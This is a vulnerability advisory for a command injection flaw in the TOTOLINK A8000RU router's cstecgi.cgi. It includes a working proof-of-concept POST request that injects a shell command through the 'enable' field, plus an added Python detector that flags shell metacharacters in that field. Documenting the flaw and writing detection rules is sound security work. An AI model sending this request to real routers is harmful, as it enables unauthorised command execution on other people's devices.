# Summary of Command Injection Vulnerability in A8000RU

## Vulnerability Overview

A command injection vulnerability exists in the TOTOLINK A8000RU router. In `cstecgi.cgi`, an attacker can execute arbitrary operating system commands by crafting a malicious request that exploits the `enable` parameter.

## Affected Scope

- **Vendor**: TOTOLINK
- **Product**: A8000RU
- **Version**: 7.1cu.643_b20200521
- **Vulnerability Type**: Command Injection

## Remediation

No specific remediation steps or patches are currently provided on the vendor's page. It is recommended to contact the vendor to obtain updates.

## Proof of Concept (PoC)

### HTTP Request Example

```http
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.6.2
Content-Length: 76
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.6.2
Referer: http://192.168.6.2/basic/index.html
Accept-Encoding: gzip, deflate, br
Cookie: SESSION_ID=2172465792.2
Connection: keep-alive

{"topicUrl":"setPptpServerCfg","enable":"ls>./setPptpServerCfg.txt"}
```

### Exploitation Result

After executing the above request, the router successfully created the `setPptpServerCfg.txt` file. The file contains a list of filenames from the target directory, confirming that the command `ls>./setPptpServerCfg.txt` was executed successfully.
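
With no vendor fix listed, one compensating control is to alert on requests shaped like the PoC above. The following check is an added example, not part of the original advisory or any vendor tooling: it inspects a captured HTTP request in text form and flags a `setPptpServerCfg` call whose `enable` value is not a plain flag. The function names, the sample requests other than the PoC body, and the assumption that a legitimate `enable` value is a short alphanumeric flag are all illustrative.

```python
import json
import re

# Assumption (not stated on the page): a legitimate "enable" value is a short
# on/off style flag, so anything else in that field is worth an alert.
PLAIN_FLAG = re.compile(r"[A-Za-z0-9]{1,8}")
SHELL_META = re.compile(r"[;&|`$<>(){}\\\n\r]")

def inspect_request(raw):
    """Return a list of findings for one captured HTTP request (text form)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n", 1)[0].split()
    if len(parts) < 2 or parts[0] != "POST":
        return []
    if parts[1].split("?", 1)[0] != "/cgi-bin/cstecgi.cgi":
        return []
    try:
        params = json.loads(body)
    except ValueError:
        return ["cstecgi.cgi body is not valid JSON"]
    if not isinstance(params, dict) or params.get("topicUrl") != "setPptpServerCfg":
        return []
    if "enable" not in params:
        return []
    value = params["enable"]
    # Non-string JSON values (numbers, booleans) are checked in serialized form.
    text = value if isinstance(value, str) else json.dumps(value)
    hits = sorted(set(SHELL_META.findall(text)))
    if hits:
        return ["setPptpServerCfg enable contains shell metacharacters: " + "".join(hits)]
    if not PLAIN_FLAG.fullmatch(text):
        return [f"setPptpServerCfg enable is not a plain flag: {text!r}"]
    return []

def build(body):
    """Wrap a body in a minimal, constructed request to the CGI endpoint."""
    return ("POST /cgi-bin/cstecgi.cgi HTTP/1.1\r\nHost: 192.168.6.2\r\n"
            "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n\r\n" + body)

# The first body is the PoC from this page; the other two are constructed.
SAMPLES = [
    build('{"topicUrl":"setPptpServerCfg","enable":"ls>./setPptpServerCfg.txt"}'),
    build('{"topicUrl":"setPptpServerCfg","enable":"1"}'),
    build('{"topicUrl":"setPptpServerCfg","enable":"on off"}'),
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect_request(sample) or "ok")
```

The same allowlist logic can be expressed as a rule in a reverse proxy or IDS placed in front of the management interface; the field name and endpoint are the ones shown in the PoC.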